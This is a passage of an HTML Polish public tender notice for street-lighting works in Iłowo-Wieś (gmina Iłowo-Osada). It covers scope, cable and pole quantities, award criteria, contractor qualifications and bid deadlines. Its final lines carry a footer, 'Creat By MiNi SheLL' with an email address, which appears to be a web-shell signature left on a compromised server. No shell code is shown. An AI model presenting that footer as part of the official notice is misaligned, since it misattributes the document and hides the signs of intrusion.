class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> CZĘŚĆ 3. Rozbudowa oświetlenia ulicznego przy ul. Okrężnej w m. Iłowo-Wieś.<br/>1) Przedmiotowy zakres robót obejmuje prace związane z wykonaniem oświetlenia ulicznego przy ul. Okrężnej w m. Iłowo-Wieś – w ramach zadania pn.: „Rozbudowa oświetlenia ulicznego w gminie Iłowo-Osada oraz wykonanie oświetlenia na boisku bocznym stadionu sportowego w m. Iłowo-Osada”. Inwestycja zlokalizowana: Iłowo-Wieś, działka oznaczona numerem 683, 686, obręb ewid. 0004 Iłowo-Osada, pow. działdowski. Roboty realizowane na podstawie Zgłoszenia robót budowlanych na ww. zadanie realizowane w formie ryczałtowej w zakresie: <br/>•	Zasilenie projektowanej linii nn kablowej oświetlenia ulicznego wraz z układem pomiarowym<br/>- ręczne kopanie rowów dla kabli, szerokość dna do 0.4˙m, kategoria gruntu III, głębokość rowu do 0.8 m - 14 m;<br/>- Nasypanie warstwy piasku na dnie rowu kablowego, szerokość do 0,4 m - 28 m;<br/>- Układanie bednarki, w rowach kablowych, przekrój bednarki do 120˙mm2 - 15 m;<br/>- Ułożenie rur osłonowych DVK 75mm - 14 m;<br/>- Układanie kabli w rurach, pustakach lub kanałach zamkniętych, kabel l YAKXs 0,6/1kV 4x25mm2 SE - 30 m;<br/>- Obróbka na sucho kabli na napięcie do 1kV o izolacji i powłoce z tworzyw sztucznych, kabel 1-żyłowy, do 50 mm2 - 16 szt;<br/>- Zasypanie rowów dla kabli, ręcznie, grunt kategorii III - 14 m3;<br/>- Urządzenia rozdzielcze (zestaw szafka SOU-2/W/F) na fundamentach, masa do 20 kg, na fundamencie prefabrykowanym - 1 kpl;<br/>- Aparaty elektryczne (astronomiczny zegar= stycznik), masa do 2,5 kg - 2 szt;<br/>•	Linia oświetlenia ulicznego<br/>- ręczne kopanie rowów dla kabli, szerokość dna do 0.4˙m, kategoria gruntu III, głębokość rowu do 0.8 m - 106 m;<br/>- Nasypanie warstwy piasku na dnie rowu kablowego, szerokość do 0,4 m - 106 m;<br/>- Układanie płaskownika FeZn, w rowach kablowych, przekrój bednarki do 120 mm2 - 125 m;<br/>- Układanie rur ochronnych z DVK w wykopie, rura do Fi 75 mm (R = 0,955 M = 1,000 S = 1,000) - 4 m;<br/>- Układanie rur ochronnych z PCW w wykopie, rura do Fi 50 mm (R = 0,955 M = 1,000 S = 1,000) - 125 m;<br/>- Układanie kabli w rurach, pustakach lub kanałach zamkniętych, kabel do 1,0˙kg/m Kabel YAKXs 0,6/1kV 4x25mm2 SE - 140 m;<br/>- Wykopy pionowe ręczne dla urządzenia przeciskowego wraz z jego zasypaniem, grunt nienawodniony, kategorii I-II -1 m3;<br/>- Przewierty mechaniczne dla rur pod obiektami, rura do Fi˙100˙mm (pierwsza w wiązce) - 5 m;<br/>- Obróbka na sucho kabli na napięcie do 1kV o izolacji i powłoce z tworzyw sztucznych, kabel 4-żyłowy, do 50˙mm2 - 10 szt;<br/>- Ręczne zasypywanie rowów do kabli, szerokość dna wykopu do 0.4˙m, kategoria gruntu III, głębokość rowu do 0.8 m - 106 m;<br/>- Badania i pomiary instalacji uziemiającej, piorunochronnej i skuteczności zerowania, uziemienie ochronne lub robocze, pomiar pierwszy - 1 szt;<br/>- Badania i pomiary instalacji uziemiającej, piorunochronnej i skuteczności zerowania, uziemienie ochronne lub robocze, pomiar każdy następny - 6 szt;<br/>•	Montaż słupów i opraw<br/>- Montaż i stawianie słupów oświetleniowych, słup do 100˙kg, Słup aluminiowy SAL-80 andodowany, grafitowy, zabezpieczony elastomerem poliuretanowym - 5 szt;<br/>- Montaż wysięgnika aluminiowego na słupie WR-4/1/0,5/5 ZP - 5 szt<br/>- Montaż przewodów do opraw oświetleniowych, wciąganych w słupy, rury osłonowe i wysięgniki, wysokość latarń do 10˙m, przewody kabelkowe - 50 kpl<br/>- Obróbka na sucho kabli na napięcie do 1kV o izolacji i powłoce z tworzyw sztucznych, kabel 3-żyłowy, do 16 mm2 - 10 szt;<br/>- Montaż opraw oświetlenia zewnętrznego, na wysięgniku LED według PT - 5 szt;<br/>- Uziomy ze stali profilowanej miedziowane (metoda wykonania udarowa), grunt kategorii III, uziom 3 m z agregatem prądotwórczym - 3 kpl;<br/>- Obsługa geodezyjna tyczenie, inwentaryzacja - 1 kpl.<br/>Przedmiot zamówienia w zakresie szczegółowym określa dokumentacja projektowa do zgłoszenia budowy tj. Załącznik nr 10 część 3 SWZ: kosztorys ślepy/ofertowy, przedmiar robót, projekt budowlany, szczegółowa specyfikacja techniczna. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45231400-9 - Roboty budowlane w zakresie budowy linii energetycznych</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45316100-6 - Instalowanie urządzeń oświetlenia zewnętrznego</p> <p class="mb-0">45316110-9 - Instalowanie urządzeń oświetlenia drogowego</p> <p class="mb-0">31520000-7 - Lampy i oprawy oświetleniowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">25 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zgodnie z zapisami w rozdziale 16 SWZ</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Warunek, dotyczący zdolności technicznej i zawodowej:<br/>a) na potwierdzenie zdolności zawodowej <br/>Wykonawca spełni warunek jeżeli wykaże, że w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał należycie:<br/>- dla części 1:<br/>•	zrealizował co najmniej 1 robotę budowlaną polegającą na modernizacji/budowie/rozbudowie/przebudowie sieci elektroenergetycznej drogowej (ulicznej) lub parkowej, zrealizowanej należycie w ramach jednej umowy/kontraktu o wartości min 80.000,00 zł brutto;<br/>- dla części 2:<br/>•	zrealizował co najmniej 1 robotę budowlaną polegającą na modernizacji/budowie/rozbudowie/przebudowie sieci elektroenergetycznej drogowej (ulicznej) lub parkowej, zrealizowanej należycie w ramach jednej umowy/kontraktu o wartości min 50.000,00 zł brutto;<br/>- dla części 3:<br/>•	zrealizował co najmniej 1 robotę budowlaną polegającą na modernizacji/budowie/rozbudowie/przebudowie sieci elektroenergetycznej drogowej (ulicznej) lub parkowej, zrealizowanej należycie w ramach jednej umowy/kontraktu o wartości min 50.000,00 zł brutto;<br/>Przez w/w zadanie rozumie się roboty wykonane w ramach jednej umowy. Wykonawca załączy dowody potwierdzające, że ww. roboty zostały wykonane należycie, w szczególności, że zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone.<br/>Dokumentem potwierdzającym spełnienie powyższego warunku będzie wykaz robót budowlanych, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania, na druku stanowiącym załącznik nr 6 do SWZ, dla części nr 1, 2, 3 oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone (dowód - referencja bądź inny dokument wystawiony przez podmiot na rzecz którego wykonawca wykonał lub wykonuje robotę); Jeżeli robota wykonywana była na rzecz Zamawiającego – Gminy Iłowo-Osada, nie wymaga się referencji. <br/>W przypadku, gdy wartość zamówienia (umowy) jest określona w innej walucie niż w złotych polskich, Zamawiający dokona przeliczenia tej wartości na złote polskie – na podstawie średniego kursu złotego w stosunku do waluty obcej określonej w Tabeli Kursów Narodowego Banku Polskiego na dzień zamieszczenia niniejszego postępowania na stronie internetowej.<br/>b)	o udzielenie zamówienia mogą ubiegać się wykonawcy, którzy dysponują lub będą dysponować w okresie wykonywania zamówienia oraz skierują do jego realizacji co najmniej:<br/>- dla części 1:<br/>•	1 osobę posiadającą następujące kwalifikacje (kierownik budowy), która będzie dysponować uprawnieniami budowlanymi do wykonywania samodzielnych funkcji technicznych w budownictwie w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń, lub odpowiadające im równoważne uprawnienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów oraz posiadającą co najmniej 3 - letnie doświadczenie zawodowe w kierowaniu robotami budowlanymi;<br/>- dla części 2:<br/>•	1 osobę posiadającą następujące kwalifikacje (kierownik budowy), która będzie dysponować uprawnieniami budowlanymi do wykonywania samodzielnych funkcji technicznych w budownictwie w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń, lub odpowiadające im równoważne uprawnienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów oraz posiadającą co najmniej 3 - letnie doświadczenie zawodowe w kierowaniu robotami budowlanymi;<br/>- dla części 3:<br/>•	1 osobę posiadającą następujące kwalifikacje (kierownik budowy), która będzie dysponować uprawnieniami budowlanymi do wykonywania samodzielnych funkcji technicznych w budownictwie w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń, lub odpowiadające im równoważne uprawnienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów oraz posiadającą co najmniej 3 - letnie doświadczenie zawodowe w kierowaniu robotami budowlanymi;<br/>Uwaga:<br/>Uwaga: Kierownik budowy oraz kierownicy robót powinni posiadać uprawnienia budowlane zgodnie z ustawą z dnia 07 lipca 1994r. Prawo budowlane (t.j. Dz.U. z 2024 r. poz. 725 z późn. zm.) oraz rozporządzeniem Ministra Inwestycji i Rozwoju z dnia 29 kwietnia 2019 r. w sprawie przygotowania zawodowego do wykonywania samodzielnych funkcji technicznych w budownictwie (t.j. Dz. U z 2019 r. poz. 831) lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów. Zgodnie z art. 12a ustawy Prawo budowlane samodzielne funkcje techniczne w budownictwie, określone w art. 12 ust. 1 mogą również wykonywać osoby, których odpowiednie kwalifikacje zawodowe zostały uznane na zasadach określonych w przepisach odrębnych. Regulację odrębną stanowią przepisy ustawy z dnia 22 grudnia 2015 r. O zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (t.j. Dz.U. z 2023 r. poz. 334).<br/>Dokumentami potwierdzającymi spełnienie powyższego warunku będzie:<br/>•	wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, odpowiedzialnych za kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami, na druku stanowiącym załącznik nr 11 do SWZ dla części 1, 2, 3 – wykaz osób.<br/>W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia warunki udziału w postępowaniu Wykonawcy mogą wykazać łącznie. Wskazany wyżej wykaz personelu Wykonawcy stanowi jedynie minimalne wymagania dla spełnienia warunku udziału w postępowaniu. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Ze względu na ograniczoną liczbę znaków jaką można wprowadzić w formularzu ogłoszenia o zamówieniu informacje dotyczące wykazu podmiotowych środków dowodowych składanych przez Wykonawcę na wezwanie Zamawiającego w celu potwierdzenia braku podstaw wykluczenia zostały<br/>przedstawione w Specyfikacji Warunków Zamówienia Rozdział 8</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">W celu potwierdzenia spełniania przez wykonawcę warunków udziału w postępowaniu wykonawca zobowiązany jest złożyć:<br/>a)	Wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty – stanowiący załącznik nr 6 dla części 1, 2, 3 do SWZ.<br/>b)	Wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami stanowiącym załącznik nr 11 dla części 1, 2, 3 do SWZ.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Ze względu na ograniczoną liczbę znaków jaką można wprowadzić w formularzu ogłoszenia o zamówieniu informacje dotyczące wykazu podmiotowych środków dowodowych składanych przez Wykonawcę na wezwanie Zamawiającego w celu potwierdzenia braku podstaw wykluczenia zostały przedstawione w Specyfikacji Warunków Zamówienia Rozdział 13 <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W przypadku oferty Wykonawców wspólnie ubiegających się o udzielenie zamówienia:<br/>1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, żaden z nich nie może podlegać wykluczeniu na podstawie przesłanek, o których mowa w rozdziale 6 SWZ.<br/>3. W przypadku wspólnego ubiegania się o zamówienie przez wykonawców, oświadczenia, o których mowa w pkt. 8.1. SWZ składa każdy z wykonawców wspólnie ubiegających się o zamówienie. Dokumenty te potwierdzają brak podstaw wykluczenia w zakresie, w którym każdy z wykonawców wykazuje brak podstaw wykluczenia.<br/>4. W przypadku wspólnego ubiegania się o zamówienie przez wykonawców oświadczenie dotyczące wypełnienia obowiązków informacyjnych przewidzianych w art. 13 lub art. 14 RODO, zawarte w formularzu oferty podpisuje każdy z Wykonawców.<br/>5. Kopie dokumentów dotyczących wykonawców wspólnie ubiegających się o udzielenie zamówienia, muszą być poświadczone za zgodność z oryginałem przez wykonawcę wspólnie ubiegającego się o udzielenie zamówienia, w zakresie dokumentów, które każdego z nich dotyczą. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Wybrany Wykonawca jest zobowiązany do zawarcia umowy w sprawie zamówienia publicznego na warunkach określonych w projekcie/wzorze Umowy, stanowiącym Załącznik nr 9a, 9b, 9c do SWZ.<br/>2. Zakres świadczenia Wykonawcy wynikający z umowy jest tożsamy z jego zobowiązaniem zawartym w ofercie.<br/>3. Zamawiający przewiduje możliwość zmiany zawartej umowy w stosunku do treści wybranej oferty w zakresie uregulowanym w art. 454-455 p.z.p. oraz wskazanym we Wzorze Umowy, stanowiącym Załącznik nr 9a, 9b, 9c do SWZ.<br/>4. Zmiana umowy wymaga dla swej ważności, pod rygorem nieważności, zachowania formy pisemnej. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-02-20 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę należy złożyć za pośrednictwem: https://ezamowienia.gov.pl. Złożenie oferty wraz z załącznikami następuje wyłącznie przy użyciu dedykowanego Formularza do złożenia, zmiany, wycofania oferty na platformie e- Zamówienia</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-02-20 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-03-21</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Zamawiający wykluczy z postępowania o udzielenie zamówienia Wykonawców:<br/>- wobec których zachodzą przesłanki określone w art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego.

Creat By MiNi SheLL
Email: jattceo@gmail.com